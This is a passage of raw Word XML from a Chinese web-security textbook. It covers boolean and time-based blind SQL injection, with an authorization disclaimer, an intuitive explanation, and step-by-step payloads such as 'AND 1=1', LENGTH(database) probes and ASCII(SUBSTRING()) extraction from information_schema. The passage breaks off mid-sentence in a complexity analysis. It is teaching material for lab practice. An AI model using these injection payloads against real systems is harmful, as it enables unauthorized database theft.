      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP Top 10:2021 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A03:Injection，涵盖了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入及其他注入类漏洞的风险评估框架。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- PortSwigger Web Security Academy → SQL Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">学习路径，包含交互式实验环境和从基础到高级的注入实验。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Stuttard–Pinto《The Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章“注入攻击”，对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的闭合技巧、过滤器绕过有深入剖析。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Wiki（https://github.com/sqlmapproject/sqlmap/wiki）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供了完整的参数说明和高级用法文档。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="164"/>
    <w:bookmarkStart w:id="165" w:name="盲注布尔盲注与时间盲注"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">盲注:布尔盲注与时间盲注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[前置依赖框]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阅读本节前，读者应已掌握</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">联合查询注入的核心原理——包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句如何被输入打破边界、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的回显利用及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结构——以及第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的代理拦截与改包流程。靶场环境回指第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章搭建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi‑labs。盲注是联合查询注入在无回显场景下的自然延伸，二者共同构成理解后续命令注入及注入类纵深防御体系的基础。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[/前置依赖框]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[授权与隔离声明框]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令、脚本与注入载荷仅供读者在自建隔离实验网络或官方正式授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA、SQLi‑labs、OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像）上练习。实验网络必须与生产网络及公网物理隔离。未经书面授权对他人系统进行测试属于违法行为。破坏性操作前请为虚拟机打快照以便回滚。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[/授权与隔离声明框]</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="165"/>
    <w:bookmarkStart w:id="166" w:name="动机从攻击者与防御者双重视角看盲注"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">动机：从攻击者与防御者双重视角看盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的联合查询注入之所以有效，是因为服务器把数据库查询结果直接回显到了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应中。一旦开发者在代码中关闭了错误回显，或者查询结果不再出现在页面里，攻击者看似丢失了“观察输出”的渠道。然而注入点并未消失——服务器仍在执行被篡改的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句，只是执行结果无法直接“显现”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此时攻击者转向利用服务器行为的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">侧信道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过页面内容是否发生变化（布尔盲注）或响应时间是否显著延长（时间盲注），逐位推断数据。这种“无回显却可问是非”的信息窃取方式，本质上与二分查找同构——攻击者用精心构造的条件问题，将数据库中的未知字节逐步逼出。对防御者而言，盲注隐蔽性极强：攻击流量在表面上只是带有细微差异的大量正常请求，传统的签名检测或报错日志分析手段常常失效。因此，理解盲注的工作机制与对抗方法，是攻防双方必须掌握的核心能力。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="166"/>
    <w:bookmarkStart w:id="167" w:name="原理直觉为何能盲中取胜"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：为何能“盲”中取胜</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">想象一间全黑的房间，你不知道保险箱的密码，但每次尝试后你都能听到一声蜂鸣或一片静默。你可以根据蜂鸣的有无，不停变换输入来逐位确定密码。布尔盲注正是如此：构造两个逻辑条件，一个恒真（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AND 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、一个恒假（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AND 1=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），观察页面在两种情况下是否呈现可区分的差异（例如“欢迎”与“无结果”）。若差异存在，便可将条件查询串联</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SUBSTRING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ASCII</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数，把每个字符的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值与猜测值比较，依据页面反馈的真假逐步缩小范围。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间盲注的逻辑相同，但信道变为时间延迟。当应用抹平所有内容差异（如统一错误页面），攻击者仍能使数据库执行耗时操作——例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP(N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BENCHMARK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——仅在猜测正确时触发延迟，否则立即返回。攻击者通过测量响应时间推断数据，如同在无声房间中通过回声长短传递信息。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[简化]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模型：提取每一个字节等价于在一有序字符集中进行二分查找，每次条件判断对应一次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="167"/>
    <w:bookmarkStart w:id="168" w:name="核心机理布尔盲注与逐字符数据提取"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心机理：布尔盲注与逐字符数据提取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">布尔盲注的通用攻击链路如下（以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风格语法为例，不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DBMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数名略有差异）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">发现注入点并确认盲注可行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1' AND 1=1 --+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（页面正常）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1' AND 1=2 --+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（页面异常）。若两次请求返回的页面内容有明显不同（前者显示记录，后者显示空集），则存在布尔盲注。若应用对所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">错误均返回统一错误页，内容差异不可用，则需配合时间盲注补充判断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">推断数据库名长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1' AND (SELECT LENGTH(database))=N --+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">递增，直到页面从“真”变为“假”（或相反），则长度为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> N-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">N。此步通常消耗</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> O(L) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次请求，L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为长度。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[简化]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实际攻击中可能直接使用二分加速，但长度通常较小，线性测试即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐字符提取库名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1' AND ASCII(SUBSTRING((SELECT database), pos, 1)) = X --+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。对每个位置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pos，遍历可打印</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围（或二分法加快）。当页面表现为“真”时，记录该字符。重复至所有字符收集完毕，库名即得。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">枚举表名、列名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：与联合查询注入类似，攻击者通过查询</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema.tables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema.columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，用相同的布尔逻辑逐字符提取目标表名与列名。例如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ASCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(SUBSTRING((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> table_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> information_schema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> table_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">当前库名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT</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 pos, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">再用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">偏移遍历多张表。数据提取阶段则构造含敏感列名的子查询，逐字符读出内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">复杂度分析：提取一个长度为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> N </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的字符串，若使用二分查找，每个字符约需</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次请求（ASCII</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0‑127 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">折半），总请求数约</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">7N。一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
